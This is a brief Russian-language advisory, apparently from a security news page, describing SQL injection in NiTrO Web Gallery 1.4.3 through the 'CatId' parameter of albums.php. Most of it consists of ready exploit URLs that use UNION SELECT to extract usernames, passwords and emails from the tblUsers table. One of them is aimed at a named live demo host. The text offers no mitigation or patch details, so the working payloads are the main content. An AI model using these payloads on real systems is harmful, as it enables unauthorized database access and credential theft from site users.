Программа: NiTrO Web Gallery 1.4.3

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «CatId» сценарием albums.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws
(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8+from+tblUsers/*

albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws
(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/*

Демонстрация:

http://demo.nitropowered.de/albums.php?section=cats&action=show&CatId=-1+
union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,
5,6,7,8,9+from+tblUsers/*



Оставить мнение